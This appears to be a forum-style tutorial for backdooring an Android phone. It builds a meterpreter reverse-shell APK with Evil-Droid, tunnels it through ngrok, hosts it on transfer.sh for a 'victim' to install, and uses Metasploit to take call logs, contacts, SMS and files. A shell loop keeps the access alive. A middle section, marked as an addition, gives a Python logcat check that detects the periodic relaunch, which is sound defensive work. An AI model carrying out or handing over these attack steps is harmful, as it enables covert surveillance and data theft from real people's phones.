Hi, all tests were done on Kali Linux.


Create an account to use TCP connections: https://ngrok.com. An email address from a service like http://www.yopmail.com/en/ works. After creating your account, just follow the instructions to download, unzip, and create a token.

# 7z x ngrok
# ./ngrok --authtoken xxx

Create a tcp tunnel on port 1234:

# ./ngrok tcp 1234

You will receive something like this:

tcp.ngrok.io:15322 -> localhost:1234


Download evil-droid:

# git clone https://github.com/M4sc3r4n0/Evil-Droid
# cd Evil-Droid
# chmod +x evil-droid
# ./evil-droid
SET LHOST: tcp.ngrok.io
SET LPORT: 15322
PAYLOAD NAME: nice-app
payload option: android/meterpreter/reverse_tcp
choose payload apk: APK-MSF

Choose an image for your backdoored app.
Afterwards, Evil-Droid creates a self-signed certificate to sign your Android app. Once you have your app, EXIT.

Copy the file to transfer.sh:

cd Evil-Droid/evilapk
# curl --upload-file nice-app.apk https://transfer.sh/nice-app.apk
And give the link to the victim; she or he must install the app on their phone.


Open a new terminal; we use Metasploit to listen on port 1234.

# msfconsole
  use multi/handler
  set payload android/meterpreter/reverse_tcp
  set lhost
  set lport 1234

To get the call log, contacts and SMS:


Type help for other commands.

Maintain access for longer

Now that you have access to the phone, we will upload our script to maintain the access until the phone shuts down.

Open another terminal to create a little script:

# vim backdoor.sh
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20

Back in Metasploit, we are on the phone again:

cd /sdcards/download
upload backdoor.sh
sh backdoor.sh

Press Ctrl+C to quit; every 20 seconds, the app is brought back.

If the victim's phone shuts down or restarts, you lose the access, because backdoor.sh does not start at boot :-(, and we don't have root privileges to do this.
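
From the defender's side, the relaunch loop described above leaves a regular trace in the device log: the same component started again every 20 seconds. The following is an added example, not part of the original post, that looks for that pattern in logcat START lines; the log lines are constructed, and the function names and the assumed threadtime line layout are this example's own.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Assumed layout: logcat "threadtime" lines written by ActivityManager/ActivityTaskManager.
START_RE = re.compile(r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d{3}).*Activity(?:Task)?Manager: "
                      r"START u\d+ \{.*?cmp=(\S+?)[ }]")

def parse_starts(log):
    """Map each started component to the sorted list of its START timestamps."""
    starts = defaultdict(list)
    for line in log.splitlines():
        m = START_RE.match(line)
        if m:
            # logcat omits the year; a fixed leap year keeps 02-29 parseable.
            ts = datetime.strptime("2000-" + m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            starts[m.group(2)].append(ts)
    return {comp: sorted(times) for comp, times in starts.items()}

def periodic_relaunches(log, min_starts=4, max_jitter_s=2.0):
    """Return components started at a near-constant interval (a timer, not a user)."""
    findings = {}
    for comp, times in parse_starts(log).items():
        if len(times) < min_starts:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Low spread between consecutive starts means a scripted relaunch loop.
        if pstdev(gaps) <= max_jitter_s:
            findings[comp] = {"starts": len(times), "interval_s": round(mean(gaps))}
    return findings

# Constructed sample log (not captured from a real device).
_LINE = ("{ts}  1234  1300 I ActivityManager: START u0 "
         "{{act=android.intent.action.MAIN cmp={cmp}}} from uid 10187")
SAMPLE_LOG = "\n".join(_LINE.format(ts=t, cmp=c) for t, c in [
    ("03-14 10:00:01.120", "com.metasploit.stage/.MainActivity"),
    ("03-14 10:00:09.500", "com.example.mail/.Inbox"),
    ("03-14 10:00:21.340", "com.metasploit.stage/.MainActivity"),
    ("03-14 10:00:41.290", "com.metasploit.stage/.MainActivity"),
    ("03-14 10:00:55.000", "com.example.mail/.Inbox"),
    ("03-14 10:01:01.410", "com.metasploit.stage/.MainActivity"),
    ("03-14 10:01:21.380", "com.metasploit.stage/.MainActivity"),
    ("03-14 10:03:10.000", "com.example.mail/.Inbox"),
    ("03-14 10:03:12.000", "com.example.mail/.Inbox"),
])

if __name__ == "__main__":
    for comp, info in periodic_relaunches(SAMPLE_LOG).items():
        print(f"periodic relaunch: {comp} x{info['starts']} every ~{info['interval_s']}s")
```

The check keys on timing rather than on the package name, so it still fires if the default `com.metasploit.stage` name has been changed.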

Download files

To download files from the phone:

cd /sdcard
cd download
download <filename>